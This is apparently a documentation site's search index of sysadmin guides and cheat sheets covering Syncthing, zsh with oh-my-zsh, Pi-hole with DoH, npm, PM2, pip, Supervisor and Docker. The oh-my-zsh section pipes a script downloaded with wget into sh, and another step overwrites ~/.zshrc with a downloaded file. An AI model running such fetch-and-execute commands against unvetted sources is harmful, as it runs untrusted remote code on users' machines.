echo \"deb [signed-by=/usr/share/keyrings/syncthing-archive-keyring.gpg] https://apt.syncthing.net/ syncthing stable\" | sudo tee /etc/apt/sources.list.d/syncthing.list\n
Now we can update the package list and install Syncthing
sudo apt update\nsudo apt install syncthing\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#configuration-syncthing-as-a-service", "title": "Configuration Syncthing as a Service", "text": "Configuring Syncthing as a service will provide as the ability to start and stop and enable/disable the service at boot.
Create a systemd unit file for managing the Syncthing service.
nano /etc/systemd/system/syncthing@.service\n
In the next example we will be setting the Syncthing
service UI to listen on local host (127.0.0.1) and port 8384
Add the following lines to the syncthing@.service
:
[Unit]\nDescription=Syncthing - Open Source Continuous File Synchronization for %I\nDocumentation=man:syncthing(1)\nAfter=network.target\n\n[Service]\nUser=%i\nExecStart=/usr/bin/syncthing -no-browser -gui-address=\"127.0.0.1:8384\" -no-restart -logflags=0\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target\n
Save and close the file when you are finished. Then, reload the systemd daemon to apply the configuration:
systemctl daemon-reload\n
Next, start the Syncthing service with the following command depending on a user this example is root
systemctl start syncthing@root\n
To verify the status of the Syncthing service, run the following command:
systemctl status syncthing@root\n
Finally, enabled the syncthing service on boot
systemctl enable syncthing@root\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#macos-installation", "title": "MacOS Installation", "text": "You can download the MacOS installation package from Syncthing Downloads, But my preferred way is to use the Homebrew package manager.
brew install --cask syncthing\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#windows-installation", "title": "Windows Installation", "text": "Window installation from Syncthing Downloads installs the Syncthing as a service without any system tray icon or menu.
The best way I found is to use SyncTrayzor
from SyncTrayzor Github Page. It hosts and wraps Syncthing, making it behave more like a native Windows application and less like a command-line utility with a web browser interface.
You can also instal it win winget
with the following command:
winget install SyncTrayzor.SyncTrayzor\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#synology-dsm-installation", "title": "Synology DSM Installation", "text": "In order to install Syncthing, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
After we added Synology Community Packages
you will be able to install Syncthing from the Cummunity
tab.
Permissions for the Syncthing service will be handled by the new system user sc-syncthing
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#syncthing-configuration", "title": "Syncthing Configuration", "text": "The following configuration are the same for all the installation methods. I'm no going to cover the basic configuration, but I will show you some of my personal preferences.
First to configure the Syncthing we need to access it's Web UI. The Default url is http://127.0.0.1:8384
If you are using Syncthing
at remote Linux host, you can use SSH tunnel to access the Web UI.
ssh -L 8001:127.0.0.1:8384 root@192.168.102.6\n
This will forward 127.0.0.1:8384
from the remote host to 127.0.0.1:8001
on the local host.
For security reasons, I like to disable all the Discovery and Repay services.
When you disable the Discovery service, you will have to manually add the connection to other devices.
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#manual-connection-example", "title": "Manual Connection Example", "text": "tcp://192.168.1.1:22000\n
or
tcp://example.com:22000\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#syncthing-files-ignore-patterns", "title": "Syncthing Files Ignore Patterns", "text": "Syncthing supports of Ignore Patterns
you can use it to Ignore Files
synchronization. This will save you a lot of headaches with sync errors
Here is a list of the Ignore Patterns
for system files:
// Apple macOS\n(?d).DS_Store\n(?d).localized\n(?d)._*\n(?d).Icon*\n(?d).fseventsd\n(?d).Spotlight-V100\n(?d).DocumentRevisions-V100\n(?d).TemporaryItems\n(?d).Trashes\n(?d).Trash-1000\n(?d).iCloud\n(?d)Photos Library.photoslibrary\n\n// GNU/Linux\n(?d).directory\n(?d).Trash-*\n\n// Microsoft Windows\n(?d)desktop.ini\n(?d)ehthumbs.db\n(?d)Thumbs.db\n(?d)$RECYCLE.BIN\n(?d)System Volume Information\n\n// QNAP QTS\n(?d).AppleDB\n(?d).@_thumb\n(?d).@__thumb\n\n// Synology DSM\n(?d)@eaDir\n\n// Adobe Lightroom\n*Previews.lrdata root-pixels.db\n\n// Dropbox\n.dropbox\n.dropbox.attr\n\n// Firefox & Chrome\n*.part\n*.crdownload\n\n// Microsoft Office\n~*\n\n// Parallels Desktop for Mac\n.parallels-vm-directory\n\n// Resilio Sync\n.sync\n*.bts\n*.!Sync\n.SyncID\n.SyncIgnore\n.SyncArchive\n*.SyncPart\n*.SyncTemp\n*.SyncOld\n\n// Temporary and backup files\n*.temporary\n*.tmp\n*._mp\n*.old\n*.syd\n*.dir\n*.gid\n*.chk\n*.dmp\n*.nch\n.*.swp\n*~\n\n// Vim\n*.*.sw[a-p]\n
Example of working Syncthing
Web UI:
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/guides/better-terminal-experience/", "title": "Better Terminal Experience", "text": "", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#introduction", "title": "Introduction", "text": "I have been using terminal for a long time, it's one of my essential tools for my everyday work and hobbies. The default terminal experience is not very user friendly, and I find it sometimes frustrating to use for basic tasks. So I decided to improve my terminal experience for macOS and Linux without too much effort from the user side. This guide will help you to install and configure the **better terminal experience in less than 5 minutes.
Better Terminal Experience guide based on ZSH Shell with Oh My Zsh on top of it. Using built-in theme called Bira
, zsh auto suggestions plugin that suggests commands as you type based on history and completions and zsh syntax highlighting plugin that highlighting of commands whilst they are typed at a zsh prompt into an interactive terminal.
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#whats-zsh", "title": "What's ZSH", "text": "Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#whats-oh-my-zsh", "title": "What's Oh-My-Zsh", "text": "Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#installation", "title": "Installation", "text": "", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#requirements", "title": "Requirements", "text": " Install the following requirements packages with the following commands:
Linux apt exampleMacOS homebrew example apt install -y git zsh wget\n
brew install git wget zsh\n
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#oh-my-zsh", "title": "Oh My Zsh", "text": "We can proceed to install Oh My Zsh with the following command:
sh -c \"$(wget https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -)\"\n
Answer Yes when asked to change the default shell to zsh.
Install Autosuggestions, Syntax-Highlighting Plugins using git clone:
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting\ngit clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions\n
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#configuration", "title": "Configuration", "text": "Oh My Zsh crates a default configuration file called .zshrc
in the user's home directory.
We need to edit the configuration file. You can use any editor to edit the file.
nano example:
nano ~/.zshrc\n
We need to add or change the following lines to the configuration file:
Find the theme and change it to bira
ZSH_THEME=\"bira\"\n
find the plugins
and change it to the following:
plugins=(git colored-man-pages docker docker-compose iterm2 node npm brew colorize macos pip pyenv virtualenv adb aws command-not-found zsh-autosuggestions zsh-syntax-highlighting)\n
The autosuggestions plugin has a bug with copy and paste so there is a workaround for that. Append the following to the end of the config to activate the workaround.
## Fix for Slow zsh-autosuggestions copy&paste\nautoload -Uz bracketed-paste-magic\nzle -N bracketed-paste bracketed-paste-magic\nzstyle ':bracketed-paste-magic' active-widgets '.self-*'\n
Save and exit the file. Open new terminal window and enjoy Better Terminal Experience!
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#bonus-personal-theme-preconfigured", "title": "Bonus: Personal Theme, preconfigured", "text": "I've made a personal theme 3os based on the Bira theme with some tweaks.
Danger
The following commands will overwrite your current config if exists.
Make sure you have a backup of your config before proceeding!!!
wget -O ~/.oh-my-zsh/themes/3os.zsh-theme https://3os.org/assets/zsh/3os.zsh-theme\nwget -O ~/.zshrc https://3os.org/assets/zsh/zshrc_config\n
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/pihole-doh/", "title": "Pi-hole as DNS Server with DNS over HTTPS (DOH) Based on Docker Containers", "text": "", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#whats-pi-hole", "title": "What's Pi-hole?", "text": "Pi-hole Official Website Official Website.
Pi-hole is a DNS server that is designed to block ads and trackers. It is a free and open source software project. It's based on blocklists and acts as a DNS sinkhole.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#whats-dns-over-https-doh", "title": "What's DNS over HTTPS (DOH)?", "text": "DNS over HTTPS (DoH) is an internet security protocol that communicates domain name server information in an encrypted way over HTTPS connections.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#my-pi-hole-setup", "title": "My Pi-hole Setup", "text": "My setup fully depends on pi-hole dns server, that's why I use two servers one as primary DNS Server and the second as secondary DNS server.
I've configured my router as a DNS server for all the DHCP clients with primary and the secondary DNS as my pi-hole servers. This way all the clients requests the router to resolve the DNS and the router forwards the request to the pi-hole servers.
Pi-hole-1 runs on ubuntu server (virtual machine) Pi-hole-2 runs on Raspberry Pi Warning
This is not a step by step guide for all the configurations of pihole or how to use docker containers. The following instuctions include only the deployemt of the pi-hole server with DoH providers.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#installation", "title": "Installation", "text": "We Will be using docker-compose
to deploy the pi-hole server with DoH providers with a single configuration file.
The following docker-compose.yml includes two images: Pi-hole container, and cloudflared container. When you run docker-compose up
the containers will be created and started. I't will create internal network for the pihole and two instances of cloudflared. When a request comes in the pihole will forward the request to the cloudflared instances one of them will use Cloudflare DNS servers and the other will use Google's DNS servers. There is no need to configure the pihole's DNS server at the UI since the configuration is done by docker-compose.yml
file.
When using this setup two folders will be created on the Host machine for persistent storage of the containers: config, dnsmasq.d
. Those folders will be mounted to the containers when its running/restarted/recreated. Those folders will be created at the root folder of the docker-compose.yml file.
Create a folder for the deployment of the containers at your host machine. create a file named docker-compose.yml
at the root folder and copy the following content to it:
version: '2.4'\n\nservices:\npihole:\ncontainer_name: pihole\nhostname: pihole\nrestart: always\nimage: pihole/pihole\nnetworks:\ndns:\nipv4_address: 172.20.0.9\ndepends_on:\ngoogle-8.8.8.8:\ncondition: service_started\ncloudflare-1.1.1.1:\ncondition: service_started\nvolumes:\n- ./config:/etc/pihole/\n- ./dnsmasq.d:/etc/dnsmasq.d/\n- /etc/localtime:/etc/localtime\nports:\n- '7003:80'\n- '53:53/tcp'\n- '53:53/udp'\nenvironment:\n- ServerIP=127.0.0.1\n- WEBPASSWORD=ChangeMe\n- PIHOLE_DNS_=172.20.0.10;172.20.0.12\n\ncloudflare-1.1.1.1:\ncontainer_name: cloudflare-1.1.1.1\nhostname: cloudflare-1.1.1.1\nrestart: always\nimage: visibilityspots/cloudflared\nnetworks:\ndns:\nipv4_address: 172.20.0.10\nexpose:\n- '53/tcp'\n- '53/udp'\nenvironment:\n- PORT=53\n- UPSTREAM1=https://1.1.1.1/dns-query\n- UPSTREAM2=https://1.1.1.1/dns-query\nvolumes:\n- /etc/localtime:/etc/localtime\n\ngoogle-8.8.8.8:\ncontainer_name: google-8.8.8.8\nhostname: google-8.8.8.8\nrestart: always\nimage: visibilityspots/cloudflared\nnetworks:\ndns:\nipv4_address: 172.20.0.12\nexpose:\n- '53/tcp'\n- '53/udp'\nenvironment:\n- PORT=53\n- UPSTREAM1=https://8.8.8.8/dns-query\n- UPSTREAM2=https://8.8.8.8/dns-query\nvolumes:\n- /etc/localtime:/etc/localtime\n\nnetworks:\ndns:\nipam:\nconfig:\n- subnet: 172.20.0.0/24\n
Now run docker-compose up -d
to create the containers. If all went well you should should be able to access the pihole server at http://127.0.0.1.7003
with password ChangeMe
from the config above.
Now you need to change your dns server to point to the pihole server. We are done with the installation.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "development/node-npm/npm/", "title": "Npm Command-line Utility", "text": "npm is two things: first and foremost, it is an online repository for the publishing of open-source Node.js projects; second, it is a command-line utility for interacting with said repository that aids in package installation, version management, and dependency management. A plethora of Node.js libraries and applications are published on npm, and many more are added every day.
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/npm/#updating-node-npm-to-latest-stable-version", "title": "Updating Node & npm to Latest Stable Version", "text": "npm:
npm install -g npm\n
node:
npm cache clean -f\nnpm install -g n\nn stable\n
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/npm/#updating-local-project-packages", "title": "Updating Local Project Packages", "text": "Navigate to the root directory of your project and ensure it contains a package.json In your project root directory, run:
npm update\n
To test the update, run the outdated
command. There should not be any output.
npm outdated\n
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/npm/#updating-globally-installed-packages", "title": "Updating Globally-Installed Packages", "text": "To see which global packages need to be updated, on the command line, run:
npm outdated -g --depth=0\n
To update a single global package, on the command line, run:
npm update -g <package_name>\n
To update all global packages, on the command line, run:
npm update -g\n
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/pm2/", "title": "PM2 - Node.js Process Manager", "text": "PM2 is a daemon process manager that will help you manage and keep your application online. Getting started with PM2 is straightforward, it is offered as a simple and intuitive CLI, installable via NPM.
Follow the official documentation for installation and usage instructions: PM2 Official Documentation
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#installation", "title": "Installation", "text": "The latest PM2 version is installable with NPM or Yarn:
npm install pm2@latest -g\n# or\nyarn global add pm2\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#start-an-application-with-pm2", "title": "Start An Application With PM2", "text": "The simplest way to start, daemonize and monitor your application is by using this command line:
pm2 start app.js\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#start-application-with-detailed-time-for-logs", "title": "Start Application With Detailed Time For Logs", "text": "pm2 start app.js --log-date-format \"YYYY-MM-DD HH:mm:ss\"\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#managing-processes", "title": "Managing Processes", "text": "Managing application state is simple here are the commands:
pm2 restart app_name\npm2 reload app_name\npm2 stop app_name\npm2 delete app_name\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#save-configuration-of-processes-to-pm2", "title": "Save Configuration of Processes to PM2", "text": "And to freeze a process list for automatic respawn:
pm2 save\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#list-managed-applications", "title": "List Managed Applications", "text": "List the status of all application managed by PM2:
pm2 [list|ls|status]\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#display-logs", "title": "Display Logs", "text": "To display logs in realtime for all processes managed by PM2, use the following command:
pm2 logs\n
To display logs in realtime for all processes managed by PM2, for last 200 lines use the following command:
pm2 logs --lines 200\n
To display logs in realtime for specific process, use the following command:
pm2 logs <app_name>/<id>\n
To display logs in realtime for specific process, for last 200 lines use the following command:
pm2 logs <app_name>/<id> --lines 200\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#auto-startup-pm2", "title": "Auto Startup PM2", "text": "Restarting PM2 with the processes you manage on server boot/reboot is critical. To solve this, just run this command to generate an active startup script:
pm2 startup\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#auto-startup-pm2-on-raspberry-pi", "title": "Auto Startup PM2 on Raspberry Pi", "text": "When using PM2 on Raspberry Pi. You will encounter a problem when you try to start pm2 with the default command.
sudo env PATH=$PATH:/usr/local/bin pm2 startup systemd -u pi --hp /home/pi\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#updating-pm2", "title": "Updating PM2", "text": "It's very useful to update PM2 to the latest version specially when you update your Node.js version. Since updating node usually will brake the pm2 process to function properly, you can use the following command to update PM2:
npm install pm2@latest -g\n
Then update the in-memory PM2:
pm2 update\n
You can also create a alias
to update PM2 with one command:
alias pm2update='npm install pm2@latest -g && pm2 update && pm2 save'\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/python/pip/", "title": "Pip Python Package Manager Cheat Sheet", "text": "Pip is the package installer for Python. You can use it to install packages from the Python Package Index and other indexes.
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#list-installed-packages-with-pip", "title": "List Installed Packages With Pip", "text": "pip list\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#list-outdated-packages", "title": "List Outdated Packages", "text": "pip list --outdated\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#instal-or-update-package-to-specific-version", "title": "Instal Or Update Package To Specific Version", "text": "exmaple with MySQL_python package:
pip install MySQL_python==1.2.2\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#update-package-to-the-latest-avalable-version", "title": "Update Package To The Latest Avalable Version", "text": "exmaple with MySQL_python package:
pip install MySQL_python --upgrade\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#update-pip-itself", "title": "Update Pip Itself", "text": "pip install --upgrade pip\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#update-all-packages-installed-with-pip", "title": "Update All Packages Installed With Pip", "text": "pip list --outdated --format=freeze | grep -v '^\\-e' | cut -d = -f 1 | xargs -n1 pip install -U\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#generate-requirementstxt-for-a-project", "title": "Generate requirements.txt For a Project", "text": "Run this command at terminal at the root of the project:
pip freeze > requirements.txt\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/", "title": "Supervisor Python Processes Management", "text": "Supervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems. Official Supervisord Docs.
Example of Supervisord Web UI listening on localhost:9999
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#tips-of-supervisor-usage", "title": "Tips of Supervisor Usage", "text": "Seeing all child processes running
supervisorctl -c /path/to/supervisord.conf\n
I find it helpful to create an alias in my bash profile for those 2 commands above so that I don't have to manually type -c
all the time
Example:
echo \"alias supervisord='supervisord -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'\"\necho \"alias supervisorctl='supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'\"\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#list-all-processes", "title": "List All Processes", "text": "You need to provide the path to the supervisor configuration file with - -c /path/to/supervisord.conf
supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#reload-changes-from-config-file-to-supervisor", "title": "Reload Changes from Config File to Supervisor", "text": "supervisorctl reread\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#update-supervisor-configuration", "title": "Update Supervisor Configuration", "text": "supervisorctl update\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#macos-supervisor-installation", "title": "MacOS Supervisor Installation", "text": "Install with pip as system package:
brew install supervisor\n
The default location of the supervisor configuration file is at /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
.
You can use a symbolic link to the configuration file to make it persistent. For example, you can move the configuration file to Dropbox folder and use a symbolic link to it.
Link the configuration file to the Dropbox folder:
rm -rf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf\nln -s /Users/fire1ce/Dropbox/SettingsConfigs/supervisor/supervisord.conf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#start-supervisor-service-on-boot", "title": "Start Supervisor Service on Boot", "text": "In order to start the supervisor service on boot, we need to create a service file for MacOS.
sudo nano /Library/LaunchDaemons/com.agendaless.supervisord.plist\n
Append the following content to the file:
<!-- /Library/LaunchDaemons/com.agendaless.supervisord.plist -->\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n<key>KeepAlive</key>\n<dict>\n<key>SuccessfulExit</key>\n<false/>\n</dict>\n<key>Label</key>\n<string>com.agendaless.supervisord</string>\n<key>ProgramArguments</key>\n<array>\n<string>/opt/homebrew/bin/supervisord</string>\n<string>-n</string>\n<string>-c</string>\n<string>/System/Volumes/Data/opt/homebrew/etc/supervisord.conf</string>\n</array>\n<key>RunAtLoad</key>\n<true/>\n</dict>\n</plist>\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#supervisor-configuration-file-example-with-2-managed-processes", "title": "Supervisor Configuration File Example With 2 Managed Processes:", "text": "[unix_http_server]\nfile=/opt/homebrew/var/run/supervisor.sock # the path to the socket file\n\n\n[inet_http_server] # inet (TCP) server disabled by default\nport=127.0.0.1:9999 # ip_address:port specifier, *:port for all iface\n# username=user # default is no username (open server)\n# password=123 default is no password (open server)\n\n[supervisord]\nlogfile=/opt/homebrew/var/log/supervisord.log # main log file# default $CWD/supervisord.log\nlogfile_maxbytes=50MB # max main logfile bytes b4 rotation# default 50MB\nlogfile_backups=10 # # of main logfile backups# 0 means none, default 10\nloglevel=info # log level# default info# others: debug,warn,trace\npidfile=/opt/homebrew/var/run/supervisord.pid # supervisord pidfile# default supervisord.pid\nnodaemon=false # start in foreground if true# default false\nsilent=false # no logs to stdout if true# default false\nminfds=1024 # min. avail startup file descriptors# default 1024\nminprocs=200 # min. avail process descriptors#default 200\n\n[rpcinterface:supervisor]\nsupervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface\n\n[supervisorctl]\nserverurl=unix:///opt/homebrew/var/run/supervisor.sock\n\n[include]\nfiles = /opt/homebrew/etc/supervisor.d/*.ini\n\n[program:macos-bt-connect-based-on-ip]\ncommand=/Users/fire1ce/.pyenv/versions/macos-bt-connect-based-on-ip/bin/python /Users/fire1ce/projects/macos-bt-connect-based-on-ip/macos-bt-connect-based-on-ip.py\ndirectory=/Users/fire1ce/projects/macos-bt-connect-based-on-ip\nuser=fire1ce\nautostart=true\nautorestart=true\nstartsecs=2\nstartretries=3\nstdout_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.out.log\nstdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)\nstderr_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.err.log\nstderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)\n\n\n[program:macos-screenlock-api]\ncommand=/Users/fire1ce/.pyenv/versions/macos-screenlock-api/bin/python /Users/fire1ce/projects/macos-screenlock-api/macos-screenlock-api.py\ndirectory=/Users/fire1ce/projects/macos-screenlock-api\nuser=fire1ce\nautostart=true\nautorestart=true\nstartsecs=2\nstartretries=3\nstdout_logfile=/opt/homebrew/var/log/macos-screenlock-api.out.log\nstdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)\nstderr_logfile=/opt/homebrew/var/log/macos-screenlock-api.err.log\nstderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/virtualenv/", "title": "Python Virtual Environment", "text": "", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#about-python-virtual-environment-venv", "title": "About Python Virtual Environment - venv", "text": "venv is a tool to create isolated Python environments. Since Python 3.3, a subset of it has been integrated into the standard library under the venv module. The venv module provides support for creating lightweight \u201cvirtual environments\u201d with their own site directories, optionally isolated from system site directories. Each virtual environment has its own Python binary (which matches the version of the binary that was used to create this environment) and can have its own independent set of installed Python packages in its site directories.
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#install-venv", "title": "Install venv", "text": "In order to install venv
, we need to install the following packages:
apt examplesudo apt install python3-venv\n
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#initialization-of-a-virtual-environment", "title": "Initialization of a Virtual Environment", "text": "Go to the root destination of your project and run the following command:
python3 -m venv .venv\n
This will create a virtual environment in the current directory. The virtual environment folder will be named .venv
.
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#activation-of-a-virtual-environment", "title": "Activation of a Virtual Environment", "text": "In order to activate a virtual environment, from the root directory of your project, run the following command:
source .venv/bin/activate\n
Check if the virtual environment is activated by running the following command:
which python\n
The output should be with ../.venv/bin/python
as the output.
Bonus:
You can add an alias to your bash profile to make it easier to activate the virtual environment:
alias activate='source .venv/bin/activate'\n
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#deactivation-of-a-virtual-environment", "title": "Deactivation of a Virtual Environment", "text": "When you are done with the virtual environment, you can deactivate it by running the following command:
deactivate\n
Or alternatively you can exit the current shell.", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/ruby/ruby/", "title": "Ruby Gem Package Manager", "text": "RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a \"gem\"), a tool designed to easily manage the installation of gems, and a server for distributing them.
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#finding-installed-and-available-gems", "title": "Finding Installed And Available Gems", "text": "gem list\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#installing-new-gems", "title": "Installing New Gems", "text": "gem install rails_utils\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#removing-deleting-gems", "title": "Removing / Deleting Gems", "text": "gem uninstall rails_utils\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#finding-outdated-gems", "title": "Finding Outdated Gems", "text": "gem outdated\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#get-gem-ruby-environment-information", "title": "Get Gem & Ruby Environment Information", "text": "gem environment\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#update-all-the-gems", "title": "Update All the Gems", "text": "Install rubygems-update
gem install rubygems-update\n
Then run:
gem update --system\nupdate_rubygems\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#reading-the-gem-documentation", "title": "Reading The Gem Documentation", "text": "One of the most handy and important things about gems is that they [should] come with good documentation to allow you to start working with them fast. The simplest way to go with documentation is to run a local server where you will have access to all installed gems\u2019 usage instructions.
Run the following to run a documentation server:
gem server\n
it will start a server on port 8808.
# Server started at http://0.0.0.0:8808\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/", "title": "Common Docker Commands", "text": "This is a short summary of the most commonly used Docker commands. If you're new to Docker, or even experienced Docker, it can be helpful to have a quick reference to the most commonly used Docker commands for managing the Docker environment.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#show-all-containers-including-running-and-stopped", "title": "Show all Containers Including Running and Stopped", "text": "docker ps -a\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#show-docker-container-logs", "title": "Show Docker Container Logs", "text": "docker logs <container_id>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#get-a-container-shell", "title": "Get A Container Shell", "text": "docker exec -it <container_id> /bin/bash\n
or
docker exec -it <container_id> /bin/sh\n
depending on the shells available on the Docker image.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#stoping-containers", "title": "Stoping Containers", "text": "docker stop <container_id>\n
foce stop with kill
docker kill <container_id>\n
